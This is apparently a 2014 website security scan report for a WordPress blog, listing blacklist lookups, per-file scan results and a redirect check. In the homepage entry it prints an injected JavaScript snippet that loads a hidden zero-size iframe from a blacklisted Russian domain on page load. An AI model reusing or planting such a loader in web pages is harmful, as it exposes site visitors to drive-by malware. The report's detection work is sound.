Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=whatrudoinblog.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://whatrudoinblog.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.whatrudoinblog.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 30 Sep 2014 12:08:25 GMT Location: http://whatrudoinblog.com/ Server: Apache Content-Type: text/html; charset=UTF-8 X-Pingback: http://whatrudoinblog.com/xmlrpc.php | clean |
http://whatrudoinblog.com/ | 200 OK Content-Length: 48981 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: rabiorik.ru ...[3576 bytes skipped]... /></html><script type='text/javascript'> function create_frame(a){var b=document.getElementById('5q');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="5q";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function 5c5t41l(){create_frame("http://rabiorik.ru/onoritz.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',5c5t41l)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();5c5t41l()};window.onload=newonload}else{window.onload=5c5t41l}}}catch(err){} </script> <!-- WP Super Cache is installed but broken. The constant WPCACHEHOME must be set in the file wp-config.php and point at the WP Super Cache plugin directory. --> | ||
http://whatrudoinblog.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/cycle.js?ver=4.0 | 200 OK Content-Length: 39548 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/audioauto.js?ver=4.0 | 200 OK Content-Length: 28606 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/mosaic.js?ver=4.0 | 200 OK Content-Length: 3673 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/p.prettyPhoto.js?ver=4.0 | 200 OK Content-Length: 25215 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/backstretch.js?ver=4.0 | 200 OK Content-Length: 11734 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/gmap.js?ver=4.0 | 200 OK Content-Length: 69409 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/idTabs.js?ver=4.0 | 200 OK Content-Length: 2351 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/selectnav.js?ver=4.0 | 200 OK Content-Length: 1743 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/respond.js?ver=4.0 | 200 OK Content-Length: 9747 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/script.js?ver=4.0 | 200 OK Content-Length: 3854 Content-Type: application/javascript | clean |
http://whatrudoinblog.com/wp-content/themes/whatrudoin/js/dark.js?ver=4.0 | 200 OK Content-Length: 648 Content-Type: application/javascript | clean |
http://maps.googleapis.com/maps/api/js?sensor=false&ver=4.0 | 200 OK Content-Length: 5024 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: whatrudoinblog.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 12:08:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://whatrudoinblog.com/xmlrpc.php
GET / HTTP/1.1
Host: whatrudoinblog.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 12:08:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://whatrudoinblog.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: whatrudoinblog.com
Referer: http://www.google.com/search?q=whatrudoinblog.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: whatrudoinblog.com
Referer: http://www.google.com/search?q=whatrudoinblog.com
Result:
The result is similar to the first query. There are no suspicious redirects found.